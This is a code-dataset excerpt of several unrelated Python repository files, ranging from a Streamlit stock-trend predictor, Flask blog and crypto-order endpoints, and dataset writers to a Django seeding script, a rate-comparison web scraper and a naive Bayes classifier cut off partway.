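# df_final pairs each row's hard prediction with both class probabilities.\n        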
if st.sidebar.button('#### Make prediction'):\n            progress_text = \"Operation in progress. Please wait.\"\n            my_bar = st.progress(100, text=progress_text)\n            for percent_complete in range(100):\n                time.sleep(0.1)\n                my_bar.progress(percent_complete + 1, text=progress_text)\n            st.header(\"Forecasting result\") \n            st.dataframe(df_final,use_container_width=True)\n        else:\n            pass\n    else:\n        st.warning('You did not input the necessary features', icon=\"⚠️\")\nelif select_event == 'Link Github':\n    link_git = st.sidebar.text_input(\"Enter your link here\")\n    if link_git == \"\":\n        st.warning('You did not input the necessary features', icon=\"⚠️\")\n    else:\n#         df_link = pd.read_csv('https://raw.githubusercontent.com/BrianNguyen2001/Prediction-VN30/main/cleaned_new_data_datn.csv')\n        df_link = pd.read_csv(link_git,index_col=0)\n        if st.sidebar.button('#### Make prediction'):\n            progress_text = \"Operation in progress. Please wait.\"\n            my_bar = st.progress(100, text=progress_text)\n            for percent_complete in range(100):\n                time.sleep(0.1)\n                my_bar.progress(percent_complete + 1, text=progress_text)\n            st.header(\"Input data\")\n            st.dataframe(df_link,use_container_width=True)\n            X= df_link.iloc[:,:-1]\n            X.columns = [\"Number of buy orders\",\"Buy-orders volume\",\"Number of sell orders\",\"Sell-orders volume\",\"Order matching volume\",\"Put-through volume\",\n                         \"Positive\",\"Negative\",\"SMA_10\",\"SMA_20\",\"EMA_10\",\"EMA_20\",\"RSI_7d\",\"RSI_9d\",\"RSI_14d\"]\n            pred_new = scaler.predict(X)\n            pred_new_prob = scaler.predict_proba(X)\n\n            df_final_2 = pd.DataFrame({\"Predict\":pred_new,\n                                       'Downtrend':pred_new_prob[:,0], \n                                       'Uptrend':pred_new_prob[:,1]},index=df_link.index)\n            st.header(\"Forecasting result\")\n            st.dataframe(df_final_2,use_container_width=True)\n        else:\n            pass\nelif select_event == 'Select':\n    pass\n","repo_name":"BrianNguyen2001/Prediction-VN30","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":13960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"8006482679","text":"import os\nimport secrets # For creating a random key to save image file\nfrom PIL import Image # Resizing images using pillow module to save space on our filesystem\nfrom flask import Flask, render_template, request, session, url_for, flash, redirect, abort, Response\nfrom flask_login import login_user, current_user, logout_user, login_required # Maintains user session\nfrom flaskblogengine.forms import RegistrationForm, LoginForm, UpdateAccountForm, PostForm # Importing registration and login classes from forms.py\nfrom flaskblogengine.models import User, Post\nfrom flaskblogengine import app, db, bcrypt, es, celery\n# from flask_session import Session\n\n# Session(app)\n\n\n@app.route(\"/\")\ndef home():\n    posts = Post.query.all() # Returns list of all records of Post\n    posts = posts[::-1] # Reversing a list\n    return render_template('home.html', blogs=posts)\n\n\n@app.route(\"/search\", methods=['GET'])\ndef search():\n    search_txt = request.args.get('search')\n    conf_submit = request.args.get('submit')\n    if conf_submit == 'Submit':\n        # Searching text in 'post_index' of elasticsearch\n        search_list = es.search(index='post_index', doc_type='post_index',\n                                body = {'query': {'multi_match': {'query': search_txt, 'fields': ['author', 'title', 'content']}}})['hits']['hits']\n\n        # flash(search_list, 'danger')\n        if search_list:\n            flash(f\"Search Result for '{search_txt}'\", 'success')\n            return render_template('search-result.html', title='Search Result', results=search_list)\n        else:\n            flash(\"Your Search Does Not Match Any of Our Records\", 'info')\n            return redirect(url_for('home'))\n    else:\n        flash(\"Please submit to get the results...\", 'danger')\n        return redirect(url_for('home'))\n\n\n@celery.task\ndef download_blog(post_id):\n    post = Post.query.get_or_404(post_id)\n    blog_content = post.title + '\\t\\t' + 'By ' + post.author.username + ' ' + post.date_posted.strftime('%d-%m-%Y') + '\\n\\n' + post.content\n    blog_name = post.title.lower().replace(' ', '_') + '.txt'\n    return (blog_content, blog_name)\n\n\n@app.route('/post/<int:post_id>/export')\ndef export(post_id):\n    result = download_blog.delay(post_id)\n    file_content, file_name = result.wait()\n    return Response(file_content, mimetype=\"text/plain\",\n                    headers={\"Content-Disposition\": \"attachment;filename={}\".format(file_name)})\n\n\n@app.route(\"/about\")\ndef about():\n    return 
render_template('about.html', title='About')\n\n\n@app.route(\"/register\", methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form_obj = RegistrationForm()\n if form_obj.validate_on_submit():\n hashed_password = bcrypt.generate_password_hash(form_obj.password.data).decode('utf-8')\n user = User(username=form_obj.username.data, email=form_obj.email.data, password=hashed_password)\n db.session.add(user)\n db.session.commit()\n flash('Your account has been created', 'success') # Flashes a message on submission\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form_obj) # Passing registration object as form\n\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form_obj = LoginForm()\n if form_obj.validate_on_submit():\n user = User.query.filter_by(email=form_obj.email.data).first()\n\n if user and bcrypt.check_password_hash(user.password, form_obj.password.data):\n login_user(user, remember=form_obj.remember.data)\n # Trying to access a page directly which needs login then it stores the url you are requesting and redirects to the page you are requesting after login.\n next_page = request.args.get('next')\n # flash(f'You have logged in successfully!', 'success') # Flashes a message on submission\n return redirect(next_page) if next_page else redirect(url_for('home'))\n else:\n flash('Incorrect Username or Password!', 'danger')\n return render_template('login.html', title='Login', form=form_obj)\n\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for(\"home\"))\n\n\ndef save_picture(form_picture):\n random_hex = secrets.token_hex(8) # Creating hex token of 8 bytes\n _, f_ext = os.path.splitext(form_picture.filename) # '_' is used to throw away an unused variable in python\n picture_fn = random_hex + f_ext # creating file name with the given file extension\n picture_full_path = os.path.join(app.root_path, 'static/profile_pics', picture_fn)\n\n output_size = (125, 125)\n new_img = Image.open(form_picture) # Using PIL module here\n new_img.thumbnail(output_size) # Converting the image to 125 X 125px\n\n new_img.save(picture_full_path) # Saving the new converted image\n return picture_fn\n\n\n@app.route(\"/account\", methods=['GET', 'POST'])\n@login_required # This decorator is used to prevent accessing page when trying to access account\ndef account():\n account_form = UpdateAccountForm()\n if account_form.validate_on_submit(): # On submission of account info form we update the database.\n if account_form.picture.data:\n picture_file = save_picture(account_form.picture.data)\n current_user.img_file = picture_file\n current_user.username = account_form.username.data\n current_user.email = account_form.email.data\n db.session.commit()\n flash('Your account has been updated', 'success')\n return redirect(url_for('account'))\n elif request.method == 'GET': # Writing default username and email in the account form\n account_form.username.data = current_user.username\n account_form.email.data = current_user.email\n image_file = url_for('static', filename='profile_pics/' + current_user.img_file)\n return render_template('account.html', title='Account', img_file=image_file, account_form=account_form)\n\n\n@app.route(\"/post/new\", methods=['GET', 'POST'])\n@login_required\ndef new_post():\n new_blog_form = PostForm()\n if new_blog_form.validate_on_submit():\n post = 
Post(title=new_blog_form.title.data, content=new_blog_form.content.data, author=current_user)\n        db.session.add(post)\n        db.session.commit()\n        es.index(index='post_index', doc_type='post_index', id=post.id, body={'author': post.author.username,\n                                                                             'title': post.title,\n                                                                             'content': post.content,\n                                                                             'date_posted': post.date_posted.strftime('%d-%m-%Y')})\n        flash('Your blog has been posted!', 'success')\n        return redirect(url_for('home'))\n    return render_template('create_post.html', title='New Blog', new_blog_obj=new_blog_form, legend='New Post')\n\n\n@app.route(\"/post/<int:post_id>\")\ndef post(post_id):\n    post = Post.query.get_or_404(post_id)\n    return render_template('blog.html', title=post.title, blog=post)\n\n\n@app.route(\"/post/<int:post_id>/update\", methods=['GET', 'POST'])\n@login_required\ndef update_post(post_id):\n    post = Post.query.get_or_404(post_id)\n    if post.author != current_user:\n        abort(403)\n    form = PostForm()\n    if form.validate_on_submit():\n        post.title = form.title.data\n        post.content = form.content.data\n        db.session.commit()\n        flash('Your Blog has been updated and posted successfully.', 'success')\n        return redirect(url_for('post', post_id=post.id))\n    elif request.method == 'GET':\n        form.title.data = post.title\n        form.content.data = post.content\n    return render_template('create_post.html', title='Update Blog', new_blog_obj=form, legend='Update Blog')\n\n\n@app.route(\"/post/<int:post_id>/delete\", methods=['POST'])\n@login_required\ndef delete_post(post_id):\n    post = Post.query.get_or_404(post_id)\n    if post.author != current_user:\n        abort(403)\n    es.delete(index='post_index', doc_type='post_index', id=post_id, ignore=['400', '404'])\n    # es.indices.delete('post_index') --> Delete the index completely\n    db.session.delete(post)\n    db.session.commit()\n    flash('Your blog has been deleted from our records.')\n    return redirect(url_for('home'))\n","repo_name":"niketnishi/flask_blog_engine","sub_path":"flaskblogengine/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":8510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"34728436885","text":"\"\"\"writer module: handles writing the images to disk\"\"\"\n\nimport json\nimport os\n\nimport fsspec\nimport numpy as np\nimport pyarrow as pa\nimport pyarrow.parquet as pq\nimport webdataset as wds\n\n\nclass BufferedParquetWriter:\n    \"\"\"Write samples to parquet files incrementally with a buffer\"\"\"\n\n    def __init__(self, output_file, schema, buffer_size=100):\n        self.buffer_size = buffer_size\n        self.schema = schema\n        self._initialize_buffer()\n        fs, output_path = fsspec.core.url_to_fs(output_file)\n\n        self.output_fd = fs.open(output_path, \"wb\")\n        self.parquet_writer = pq.ParquetWriter(self.output_fd, schema)\n\n    def _initialize_buffer(self):\n        self.current_buffer_size = 0\n        self.buffer = {k: [] for k in self.schema.names}\n\n    def _add_sample_to_buffer(self, sample):\n        for k in self.schema.names:\n            self.buffer[k].append(sample[k])\n        self.current_buffer_size += 1\n\n    def write(self, sample):\n        if self.current_buffer_size >= self.buffer_size:\n            self.flush()\n        self._add_sample_to_buffer(sample)\n\n    def flush(self):\n        \"\"\"Write the buffer to disk\"\"\"\n        if self.current_buffer_size == 0:\n            return\n\n        df = pa.Table.from_pydict(self.buffer, self.schema)\n        self.parquet_writer.write_table(df)\n        self._initialize_buffer()\n\n    def close(self):\n        self.flush()\n        if self.parquet_writer is not None:\n            self.parquet_writer.close()\n            self.parquet_writer = None\n        self.output_fd.close()\n\n\n
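# Usage sketch (illustrative; the schema and path below are made up):\n#\n#     schema = pa.schema([pa.field(\"key\", pa.string())])\n#     w = BufferedParquetWriter(\"out/00000.parquet\", schema, buffer_size=100)\n#     w.write({\"key\": \"abc\"})\n#     w.close()  # flushes whatever is still buffered\n\n\n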
class ParquetSampleWriter:\n    \"\"\"ParquetSampleWriter is an image+caption writer to parquet\"\"\"\n\n    def __init__(\n        self,\n        shard_id,\n        output_folder,\n        save_caption,\n        oom_shard_count,\n        schema,\n        encode_format,\n    ):\n        self.oom_shard_count = oom_shard_count\n        self.encode_format = encode_format\n        schema = schema.append(pa.field(encode_format, pa.binary()))\n        shard_name = \"{shard_id:0{oom_shard_count}d}\".format( # pylint: disable=consider-using-f-string\n            shard_id=shard_id, oom_shard_count=oom_shard_count\n        )\n        output_file = f\"{output_folder}/{shard_name}.parquet\"\n        self.buffered_parquet_writer = BufferedParquetWriter(output_file, schema, 100)\n        self.save_caption = save_caption\n\n    def write(self, img_str, key, caption, meta):\n        \"\"\"Buffer the sample in memory; it is flushed to disk periodically and on close()\"\"\"\n        if img_str is not None:\n            sample = {\"key\": key, self.encode_format: img_str}\n            if self.save_caption:\n                sample[\"txt\"] = str(caption) if caption is not None else \"\"\n        else:\n            sample = {\"key\": key, self.encode_format: None}\n            if self.save_caption:\n                sample[\"txt\"] = None\n        sample.update(meta)\n        self.buffered_parquet_writer.write(sample)\n\n    def close(self):\n        self.buffered_parquet_writer.close()\n\n\nclass WebDatasetSampleWriter:\n    \"\"\"WebDatasetSampleWriter is an image+caption writer to webdataset\"\"\"\n\n    def __init__(\n        self,\n        shard_id,\n        output_folder,\n        save_caption,\n        oom_shard_count,\n        schema,\n        encode_format,\n    ):\n\n        self.oom_shard_count = oom_shard_count\n        shard_name = \"{shard_id:0{oom_shard_count}d}\".format( # pylint: disable=consider-using-f-string\n            shard_id=shard_id, oom_shard_count=oom_shard_count\n        )\n        self.shard_id = shard_id\n        fs, output_path = fsspec.core.url_to_fs(output_folder)\n        \n        self.tar_fd = fs.open(f\"{output_path}/{shard_name}.tar\", \"wb\")\n        self.tarwriter = wds.TarWriter(self.tar_fd)\n        self.save_caption = save_caption\n        self.buffered_parquet_writer = BufferedParquetWriter(output_folder + \"/\" + shard_name + \".parquet\", schema, 100)\n        self.encode_format = encode_format\n\n    def write(self, img_str, key, caption, meta):\n        \"\"\"Write the sample to the tar shard\"\"\"\n        if img_str is not None:\n            sample = {\"__key__\": key, self.encode_format: img_str}\n            if self.save_caption:\n                sample[\"txt\"] = str(caption) if caption is not None else \"\"\n            # some meta data may not be JSON serializable\n            for k, v in meta.items():\n                if isinstance(v, np.ndarray):\n                    meta[k] = v.tolist()\n            sample[\"json\"] = json.dumps(meta, indent=4, ensure_ascii=False)\n            self.tarwriter.write(sample)\n        self.buffered_parquet_writer.write(meta)\n\n    def close(self):\n        self.buffered_parquet_writer.close()\n        self.tarwriter.close()\n        self.tar_fd.close()\n\n\nclass FilesSampleWriter:\n    \"\"\"FilesSampleWriter is a caption+image writer to files\"\"\"\n\n    def __init__(\n        self,\n        shard_id,\n        output_folder,\n        save_caption,\n        oom_shard_count,\n        schema,\n        encode_format,\n    ):\n        self.oom_shard_count = oom_shard_count\n        shard_name = \"{shard_id:0{oom_shard_count}d}\".format( # pylint: disable=consider-using-f-string\n            shard_id=shard_id, oom_shard_count=oom_shard_count\n        )\n        self.shard_id = shard_id\n        self.fs, self.subfolder = fsspec.core.url_to_fs(f\"{output_folder}/{shard_name}\")\n        if not self.fs.exists(self.subfolder):\n            self.fs.mkdir(self.subfolder)\n        self.save_caption = save_caption\n        self.buffered_parquet_writer = BufferedParquetWriter(output_folder + \"/\" + shard_name + \".parquet\", schema, 100)\n        self.encode_format = encode_format\n\n    def write(self, img_str, key, caption, meta):\n        \"\"\"Write sample 
to disk\"\"\"\n if img_str is not None:\n filename = f\"{self.subfolder}/{key}.{self.encode_format}\"\n with self.fs.open(filename, \"wb\") as f:\n f.write(img_str)\n if self.save_caption:\n caption = str(caption) if caption is not None else \"\"\n caption_filename = f\"{self.subfolder}/{key}.txt\"\n with self.fs.open(caption_filename, \"w\") as f:\n f.write(str(caption))\n\n # some meta data may not be JSON serializable\n for k, v in meta.items():\n if isinstance(v, np.ndarray):\n meta[k] = v.tolist()\n j = json.dumps(meta, indent=4)\n meta_filename = f\"{self.subfolder}/{key}.json\"\n with self.fs.open(meta_filename, \"w\") as f:\n f.write(j)\n self.buffered_parquet_writer.write(meta)\n\n def close(self):\n self.buffered_parquet_writer.close()\n\n\nclass DummySampleWriter:\n \"\"\"Does not write\"\"\"\n\n def __init__(self, shard_id, output_folder, save_caption, oom_shard_count, schema, encode_format):\n pass\n\n def write(self, img_str, key, caption, meta):\n pass\n\n def close(self):\n pass\n","repo_name":"360CVGroup/SEEChat","sub_path":"code/tools_box/img2dataset_tools/writer.py","file_name":"writer.py","file_ext":"py","file_size_in_byte":6870,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"63"} +{"seq_id":"27861141415","text":" # -*- coding: utf-8 -*-\n# @Time : 19-2-15 下午5:52\n# @Author : SamSa\n# @Email : sajinde@qq.com\n# @File : script.py\n# @statement:\nimport os\nimport random\nimport sys\n\nimport django\n\n\n# 设置环境\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.insert(0,BASE_DIR)\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"Django_Friends.settings\")\ndjango.setup()\n\n\nfrom user.models import User\n\nfrom vip.models import Vip, Permission, VipPerm\n\n\nlast_names = (\n '赵钱孙李周吴郑王冯陈褚卫蒋沈韩杨'\n '朱秦尤许何吕施张孔曹严华金魏陶姜'\n '戚谢邹喻柏水窦章云苏潘葛奚范彭郎'\n '鲁韦昌马苗凤花方俞任袁柳酆鲍史唐'\n '费廉岑薛雷贺倪汤滕殷罗毕郝邬安常'\n '乐于时傅皮卞齐康伍余元卜顾孟平黄'\n)\n\nfirst_names = {\n 'male': [\n '致远', '俊驰', '雨泽', '烨磊', '晟睿',\n '天佑', '文昊', '修洁', '黎昕', '远航',\n '旭尧', '鸿涛', '伟祺', '荣轩', '越泽',\n '浩宇', '瑾瑜', '皓轩', '浦泽', '绍辉',\n '绍祺', '升荣', '圣杰', '晟睿', '思聪'\n ],\n 'female': [\n '沛玲', '欣妍', '佳琦', '雅芙', '雨婷',\n '韵寒', '莉姿', '雨婷', '宁馨', '妙菱',\n '心琪', '雯媛', '诗婧', '露洁', '静琪',\n '雅琳', '灵韵', '清菡', '溶月', '素菲',\n '雨嘉', '雅静', '梦洁', '梦璐', '惠茜'\n ]\n}\n\n\ndef random_name():\n \"\"\"随机生成姓名\"\"\"\n last_name = random.choice(last_names)\n sex = random.choice(list(first_names.keys()))\n first_name = random.choice(first_names[sex])\n\n return ''.join([last_name, first_name]), sex\n\n\ndef create_robots(num):\n \"\"\"创建机器人用户\"\"\"\n for i in range(num):\n name, sex = random_name()\n try:\n User.objects.create(\n sex=sex,\n nickname=name,\n location=random.choice(['bj', 'sh', 'gz', 'sz', 'cd', 'xa', 'wh']),\n birth_year=random.randint(1980,2000),\n birth_month=random.randint(1,12),\n birth_day=random.randint(1,28),\n phonenum=random.randint(21000000000,29000000000))\n print('robot:%s\\t%s'%(name,sex))\n except Exception as e:\n print(e)\n\n\n\ndef init_perm():\n \"\"\"创建权限数据\"\"\"\n permission = (\n ('vipflag', '会员身份标识'),\n ('superlike', '超级喜欢'),\n ('back', '反悔功能'),\n ('anylocation', '任意更改定位'),\n ('unlimit_like', '无限喜欢次数'),\n ('like_me', '查看喜欢过我的人'),\n )\n\n for name, desc in permission:\n perm, _ = Permission.objects.get_or_create(name=name, desc=desc)\n\n print(perm)\n\n\ndef init_vip():\n \"\"\"创建vip数据\"\"\"\n for i in range(4):\n name = '%s级会员' % i\n price = 5 * i\n vip, _ = Vip.objects.get_or_create(name=name, level=i, price=price)\n print(vip.name)\n\n\ndef 
create_vip_perm():\n    \"\"\"Create the VIP-permission relation rows\"\"\"\n\n    # fetch the VIP tiers\n    vip1 = Vip.objects.get(level=1)\n    vip2 = Vip.objects.get(level=2)\n    vip3 = Vip.objects.get(level=3)\n\n    # fetch the permissions\n    vipflag = Permission.objects.get(name='vipflag')\n    superlike = Permission.objects.get(name='superlike')\n    back = Permission.objects.get(name='back')\n    anylocation = Permission.objects.get(name='anylocation')\n    unlimit_like = Permission.objects.get(name='unlimit_like')\n    like_me = Permission.objects.get(name='like_me')\n\n    # assign permissions to VIP 1\n    VipPerm.objects.get_or_create(vip_id=vip1.id, perm_id=vipflag.id)\n    VipPerm.objects.get_or_create(vip_id=vip1.id, perm_id=superlike.id)\n\n    # assign permissions to VIP 2\n    VipPerm.objects.get_or_create(vip_id=vip2.id, perm_id=vipflag.id)\n    VipPerm.objects.get_or_create(vip_id=vip2.id, perm_id=superlike.id)\n    VipPerm.objects.get_or_create(vip_id=vip2.id, perm_id=back.id)\n\n    # assign permissions to VIP 3\n    VipPerm.objects.get_or_create(vip_id=vip3.id, perm_id=vipflag.id)\n    VipPerm.objects.get_or_create(vip_id=vip3.id, perm_id=superlike.id)\n    VipPerm.objects.get_or_create(vip_id=vip3.id, perm_id=back.id)\n    VipPerm.objects.get_or_create(vip_id=vip3.id, perm_id=anylocation.id)\n    VipPerm.objects.get_or_create(vip_id=vip3.id, perm_id=unlimit_like.id)\n    VipPerm.objects.get_or_create(vip_id=vip3.id, perm_id=like_me.id)\n\n\nif __name__ == '__main__':\n    # create_robots(5000)\n    # init_vip()\n    # init_perm()\n    # create_vip_perm()\n    pass\n\n","repo_name":"sajinchang/Django_Friends","sub_path":"scripts/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"16560486303","text":"import sys\r\n\r\ndef make_page(name, source_dir, out_dir):\r\n\ttemplate_file = open(\"template.html\")\r\n\ttext = template_file.read()\r\n\ttemplate_file.close()\r\n\r\n\tscript_format = \"{d}/{n}.js\"\r\n\r\n\tscript_file = open(script_format.format(d = source_dir, n = name))\r\n\tscript = script_file.read()\r\n\r\n\tbody_format = \"{d}/{n}.md\"\r\n\tbody_file = open(body_format.format(d = source_dir, n = name))\r\n\tbody_text = body_file.read().replace(\"`\", \"\\\\`\")\r\n\r\n\tnew_text = text.replace(\"%SCRIPT%\", script).replace(\"%TEXT%\", body_text)\r\n\r\n\tout_format = \"{d}/{n}.html\"\r\n\r\n\tout_file = open(out_format.format(d = out_dir, n = name), \"w\")\r\n\tout_file.write(new_text)\r\n\tout_file.close()\r\n\r\nsource_dir = sys.argv[1]\r\nout_dir = sys.argv[2]\r\n\r\nfor arg in sys.argv[3:]:\r\n\tmake_page(arg, source_dir, out_dir)\r\n","repo_name":"flaminnoraa/js_demos","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"24790258785","text":"from flask import Flask, request, g\nfrom flask_restful import Resource, Api\nfrom sqlalchemy import create_engine, select, MetaData, Table\nfrom flask import jsonify\nimport json\nimport eth_account\nimport algosdk\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm import scoped_session\nfrom sqlalchemy.orm import load_only\n\nfrom models import Base, Order, Log\n\nengine = create_engine('sqlite:///orders.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\n\napp = Flask(__name__)\n\n\n# These decorators allow you to use g.session to access the database inside the request code\n@app.before_request\ndef create_session():\n    g.session = scoped_session(\n        DBSession) # g is an \"application global\" 
https://flask.palletsprojects.com/en/1.1.x/api/#application-globals\n\n\n@app.teardown_appcontext\ndef shutdown_session(response_or_exc):\n g.session.commit()\n g.session.remove()\n\n\n\"\"\"\n-------- Helper methods (feel free to add your own!) -------\n\"\"\"\n\n\ndef log_message(d):\n # Takes input dictionary d and writes it to the Log table\n payload = d['payload']\n log = Log(message=json.dumps(payload))\n return log\n\n\n\"\"\"\n---------------- Endpoints ----------------\n\"\"\"\n\n\n@app.route('/trade', methods=['POST'])\ndef trade():\n if request.method == \"POST\":\n content = request.get_json(silent=True)\n print(f\"content = {json.dumps(content)}\")\n columns = [\"sender_pk\", \"receiver_pk\", \"buy_currency\", \"sell_currency\", \"buy_amount\", \"sell_amount\", \"platform\"]\n fields = [\"sig\", \"payload\"]\n error = False\n for field in fields:\n if not field in content.keys():\n print(f\"{field} not received by Trade\")\n print(json.dumps(content))\n log_message(content)\n return jsonify(False)\n\n error = False\n for column in columns:\n if not column in content['payload'].keys():\n print(f\"{column} not received by Trade\")\n error = True\n if error:\n print(json.dumps(content))\n log_message(content)\n return jsonify(False)\n\n # Your code here\n # Note that you can access the database session using g.session\n check = False\n payload = content['payload']\n payload_text = json.dumps(payload)\n\n platform = payload['platform']\n\n sk = content['sig']\n pk = payload['sender_pk']\n\n if platform == 'Algorand':\n check = algosdk.util.verify_bytes(payload_text.encode('utf-8'), sk, pk)\n elif platform == 'Ethereum':\n return_pk = eth_account.Account.recover_message(eth_account.messages.encode_defunct(text=payload_text),\n signature=sk)\n if pk == return_pk:\n check = True\n\n if check:\n order = Order(\n signature=sk,\n sender_pk=pk,\n receiver_pk=payload['receiver_pk'],\n buy_currency=payload['buy_currency'],\n sell_currency=payload['sell_currency'],\n buy_amount=payload['buy_amount'],\n sell_amount=payload['sell_amount']\n )\n g.session.add(order)\n g.session.commit()\n else:\n log_message(content)\n\n return jsonify(check)\n\n\n@app.route('/order_book')\ndef order_book():\n # Your code here\n # Note that you can access the database session using g.session\n orders = g.session.query(Order).all()\n result = {'data':\n [{'sender_pk': o.sender_pk,\n 'receiver_pk': o.receiver_pk,\n 'buy_currency': o.buy_currency,\n 'sell_currency': o.sell_currency,\n 'buy_amount': o.buy_amount,\n 'sell_amount': o.sell_amount,\n 'signature': o.signature} for o in orders]\n }\n\n return jsonify(result)\n\n\nif __name__ == '__main__':\n app.run(port='5002')\n","repo_name":"ztang3/22_582_tang","sub_path":"database_endpoint.py","file_name":"database_endpoint.py","file_ext":"py","file_size_in_byte":4023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"6918870031","text":"n = int(input())\n\narray = []\nzero = 0\nminus = []\nfor _ in range(n):\n number = int(input())\n if number > 0:\n array.append(number)\n elif number == 0:\n zero += 1\n else:\n minus.append(-number)\n\narray.sort(reverse=True)\nminus.sort(reverse=True)\n\ntotal = 0\ntmp = None\nfor i in range(len(array)):\n if tmp is None:\n tmp = array[i]\n if i == len(array) - 1:\n total += tmp\n else:\n if array[i] > 1:\n total += tmp * array[i]\n else:\n total += tmp + array[i]\n tmp = None\n array[i] = 0\n\ntmp = None\nfor i in range(len(minus)):\n if tmp is None:\n tmp = minus[i]\n 
if i == len(minus) - 1 and zero == 0:\n            total -= tmp\n    else:\n        total += tmp * minus[i]\n        tmp = None\n        minus[i] = 0\n\nprint(total)\n","repo_name":"rt3310/TIL","sub_path":"algorithm/baekjoon/1744_수 묶기.py","file_name":"1744_수 묶기.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"27640929865","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nimport time\nfrom bs4 import BeautifulSoup\nimport json\n\ndef obtenerRetasas(departamento, tipoProducto, producto, condicion):\n\n    # Open the \"retasas\" (rate comparison) page\n    driver = webdriver.Firefox()\n    driver.get(\"http://www.sbs.gob.pe/app/retasas/paginas/retasasinicio.aspx\")\n\n    # Fill in the form, giving the items time to refresh\n    select = Select(driver.find_element_by_name('ddlDepartamento'))\n    select.select_by_value(departamento)\n    time.sleep(1) \n    select = Select(driver.find_element_by_name('ddlTipoProducto'))\n    select.select_by_value(tipoProducto)\n    time.sleep(1) \n    select = Select(driver.find_element_by_name('ddlProducto'))\n    select.select_by_value(producto)\n    time.sleep(1) \n    select = Select(driver.find_element_by_name('ddlCondicion'))\n    select.select_by_value(condicion) \n\n    # Click the \"Consultar\" button\n    driver.find_element_by_id(\"btnConsultar\").click()\n    time.sleep(1) \n\n    # Point at the iframe generated with the rates table\n    driver.switch_to.frame(\"ifrmContendedor\")\n\n    # Get the iframe contents\n    soup=BeautifulSoup(driver.page_source, 'html.parser')\n\n    # Close the Selenium driver\n    driver.close()\n\n    # Get the table with the rates\n    one_a_tag = soup.find(\"table\", {\"id\": \"myTable\"})\n\n    table_body = one_a_tag.find_all('tr')\n\n    # Move the information into lists\n    table_headers = [[cell.text for cell in row(\"th\")]\n                  for row in table_body]\n\n    table_data = [[cell.text for cell in row(\"td\")]\n                  for row in table_body]\n\n    # Remove the empty header row\n    del table_data[0]\n\n    resultado = []\n\n    # Convert the list of items into a list of dictionaries\n    for fila in table_data:\n        item = {\n            table_headers[0][0]: fila[0],\n            table_headers[0][1]: fila[1],\n            table_headers[0][2]: fila[2]\n        }\n        resultado.append(item)\n\n    # Return the JSON with the rate data\n    return json.dumps(resultado, separators=(',', ':'))\n\n","repo_name":"jogacolhue/RETASASscrapper","sub_path":"retasas.py","file_name":"retasas.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"15242480379","text":"#####################\n# classify.py\n# shaurya kethireddy\n#####################\nimport os\nimport math\n\n\ndef create_bow(vocab, filepath):\n    \"\"\" Create a single dictionary for the data\n        Note: label may be None\n    \"\"\"\n    bow = {None: 0}\n    for var in vocab:\n        bow[var] = 0\n\n    file = open(filepath, \"r\")\n    for line in file:\n        holder = line.rstrip()\n        if holder in bow:\n            bow[holder] += 1\n        else:\n            bow[None] += 1\n\n    if bow[None] == 0:\n        del bow[None]\n    for obj in vocab:\n        if bow[obj] == 0:\n            del bow[obj]\n    return bow\n\n\ndef create_vocabulary(directory, cutoff):\n    \"\"\" Create a vocabulary from the training directory\n        return a sorted vocabulary list\n    \"\"\"\n    top_level = os.listdir(directory)\n    vocab = {}\n    for d in top_level:\n        subdir = d if d[-1] == '/' else d+'/'\n        files = os.listdir(directory+subdir)\n        for 
f in files:\n with open(directory+subdir+f, 'r') as doc:\n for word in doc:\n word = word.strip()\n if not word in vocab and len(word) > 0:\n vocab[word] = 1\n elif len(word) > 0:\n vocab[word] += 1\n return sorted([word for word in vocab if vocab[word] >= cutoff])\n\n\ndef load_training_data(vocab, directory):\n \"\"\" Create the list of dictionaries \"\"\"\n top_level = os.listdir(directory)\n dataset = []\n for d in top_level:\n if d[-1] == '/':\n label = d[:-1]\n subdir = d\n else:\n label = d\n subdir = d+\"/\"\n files = os.listdir(directory+subdir)\n for f in files:\n bow = create_bow(vocab, directory+subdir+f)\n dataset.append({'label': label, 'bow': bow})\n return dataset\n\n\ndef prior(training_data, label_list):\n \"\"\" return the prior probability of the label in the training set\n => frequency of DOCUMENTS\n \"\"\"\n\n smooth = 1 # smoothing factor\n logprob = {}\n total = len(training_data)\n for label in label_list:\n ctr = 0\n for data in training_data:\n if data['label'] == label:\n ctr += 1\n # log probability of certain label\n logprob[label] = math.log((ctr + smooth) / float(total + len(label_list)))\n\n return logprob\n\n\ndef p_word_given_label(vocab, training_data, label):\n \"\"\" return the class conditional probability of label over all words, with smoothing \"\"\"\n smooth = 1 # smoothing factor\n word_prob = {}\n dict = {None: 0}\n for it in vocab:\n dict[it] = 0\n ctr = 0\n for data in training_data:\n for word in data['bow']:\n if data['label'] == label:\n ctr += 